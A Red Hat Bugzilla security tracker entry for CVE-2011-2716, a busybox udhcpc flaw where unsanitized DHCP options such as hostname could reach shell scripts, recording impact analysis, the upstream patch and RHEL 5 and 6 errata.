Bug 725364 (CVE-2011-2716)

Summary: CVE-2011-2716 busybox: udhcpc insufficient checking of DHCP options
Product: [Other] Security Response Reporter: Tomas Hoger <thoger>
Component: vulnerabilityAssignee: Red Hat Product Security <security-response-team>
Status: CLOSED ERRATA QA Contact:
Severity: low Docs Contact:
Priority: low    
Version: unspecifiedCC: dvlasenk, jlieskov, maxamillion
Target Milestone: ---Keywords: Security
Target Release: ---   
Hardware: All   
OS: Linux   
Whiteboard:
Fixed In Version: Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of: Environment:
Last Closed: 2012-06-20 10:07:09 UTC Type: ---
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:
Bug Depends On: 731347, 768083, 772473, 790335, 800293, 802089    
Bug Blocks: 722974, 742493, 784298    

Description Tomas Hoger 2011-07-25 10:12:14 UTC 
A missing DHCP option checking / sanitization flaw was reported for multiple DHCP clients.  This flaw may allow DHCP server to trick DHCP clients to set e.g. system hostname to a specially crafted value containing shell special characters.  Various scripts assume that hostname is trusted, which may lead to code execution when hostname is specially crafted.

This issue was tracked in bug #689832 for ISC dhclient (CVE-2011-0997), which also discussed few other affected clients.  This bug is created to track busybox's udhcpc separately.

Upstream bug report:
https://bugs.busybox.net/show_bug.cgi?id=3979

The busybox version in Red Hat Enterprise Linux 4 is not compiled with support for udhcpc.  Version shipped with Red Hat Enterprise Linux 5 and 6 include udhcpc and are affected.  However, udhcpc is not used in Red Hat Enterprise Linux.
Comment 1 Tomas Hoger 2011-07-27 11:32:31 UTC 
(In reply to comment #0)

> Version shipped with Red Hat Enterprise Linux 5 and 6 include udhcpc and are
> affected.

To clarify the "affected" part...  udhcpc makes DHCP options supplied by the DHCP server available to the external script via environment variables.  The script can then configure DHCP options on the system in a platform specific way.  Red Hat Enterprise Linux busybox packages do not provide any such script. Example scripts that are part of the upstream busybox source tarball (examples/udhcp) do not set DHCP hostname on the system.
Comment 2 Tomas Hoger 2011-07-27 11:33:33 UTC 
Statement:

(none)
Comment 3 Tomas Hoger 2011-08-17 12:11:44 UTC 
Created busybox tracking bugs for this issue

Affects: fedora-all [bug 731347]
Comment 4 Jan Lieskovsky 2011-12-13 13:08:59 UTC 
Upstream patch:
[2] http://git.busybox.net/busybox/commit/?id=7280d2017d8075267a12e469983e38277dcf0374
Comment 9 errata-xmlrpc 2012-02-21 03:21:01 UTC 
This issue has been addressed in following products:

  Red Hat Enterprise Linux 5

Via RHSA-2012:0308 https://rhn.redhat.com/errata/RHSA-2012-0308.html
Comment 11 errata-xmlrpc 2012-06-20 07:16:11 UTC 
This issue has been addressed in following products:

  Red Hat Enterprise Linux 6

Via RHSA-2012:0810 https://rhn.redhat.com/errata/RHSA-2012-0810.html